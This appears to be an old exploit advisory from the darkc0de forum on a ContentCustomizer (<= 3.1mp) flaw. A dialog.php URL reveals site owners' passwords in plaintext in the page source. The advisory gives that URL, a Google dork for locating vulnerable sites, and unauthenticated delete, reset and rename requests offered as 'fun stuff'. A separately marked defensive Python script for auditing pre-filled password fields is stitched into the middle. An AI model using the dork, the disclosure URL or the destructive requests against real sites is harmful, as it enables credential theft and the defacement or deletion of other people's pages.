CONTENTCustomizer versions 3.1mp and below suffer from a login credential disclosure vulnerability.
CONTENTCustomizer <= v 3.1mp Login Credentials Disclosure Vulnerability
---------------------------------------
Author: d3hydr8
Homepage: darkc0de.com
Original Post: forum.darkc0de.com
---------------------------------------
Software: CONTENTCustomizer
Homepage: contentcustomizer.net
Version: <= v 3.1mp
Vuln Page: /dialog.php?action=editauthor&doc='+pagename
Method: Find a site using ContentCustomizer and get the name of a page you want to
edit (index.php).
Fill it in with our Vuln Page:
"http://example.com/generator/dialog.php?action=editauthor&doc=index.php"
In the form you will see the Username (the owner of the file), but the password
is shown as asterisks. View Source:
the password will be in the value= field in plaintext.
<td nowrap><input type=password name=newlocalpassword value="PASSWORD"
id=newlocalpassword style="width:160px;"></td>
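The root cause is visible in that markup: the server writes the stored password into the value= attribute of the password field. The following check is an added example, not part of the original advisory or of ContentCustomizer; it is meant to be run over HTML rendered by your own application, and the sample pages and the names PasswordFieldAudit and audit_html are constructed for illustration.

```python
from html.parser import HTMLParser


class PasswordFieldAudit(HTMLParser):
    """Collect <input type=password> elements rendered with a non-empty value."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        # Browsers keep the first occurrence of a duplicated attribute.
        a = {}
        for key, val in attrs:
            a.setdefault(key, val or "")
        if a.get("type", "").strip().lower() != "password":
            return
        if a.get("value", "") != "":
            line, _col = self.getpos()
            self.findings.append({
                "line": line,
                "name": a.get("name") or a.get("id") or "(unnamed)",
                "value_length": len(a["value"]),  # report length, never the secret
            })


def audit_html(html_text):
    """Return one finding per password input that carries a pre-filled value."""
    parser = PasswordFieldAudit()
    parser.feed(html_text)
    parser.close()
    return parser.findings


# Constructed sample: the field markup quoted in the advisory with a made-up
# value, followed by the same field rendered with an empty value.
VULNERABLE = '''<form>
<td nowrap><input type=password name=newlocalpassword value="s3cret-example"
id=newlocalpassword style="width:160px;"></td>
</form>'''
FIXED = '''<form>
<td nowrap><input type="password" name="newlocalpassword" value=""
id="newlocalpassword" style="width:160px;"></td>
</form>'''

if __name__ == "__main__":
    for label, page in (("vulnerable", VULNERABLE), ("fixed", FIXED)):
        print(label, audit_html(page))
```

A finding means the server can read back the stored password, so the fix is two-part: stop emitting it into the form, and store only a salted hash so there is nothing to emit.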
Trick: Hit Ctrl+Y on a page that ContentCustomizer controls and it brings
you to the login screen ;)
Dork: inurl:"generator/default.php?doc="
Other fun stuff:
dialog.php?action=del&doc='+pagename // Delete
dialog.php?action=delbackup&doc='+pagename // Delete Backup
dialog.php?action=res&doc='+pagename // Reset
dialog.php?action=ren&doc='+pagename // Rename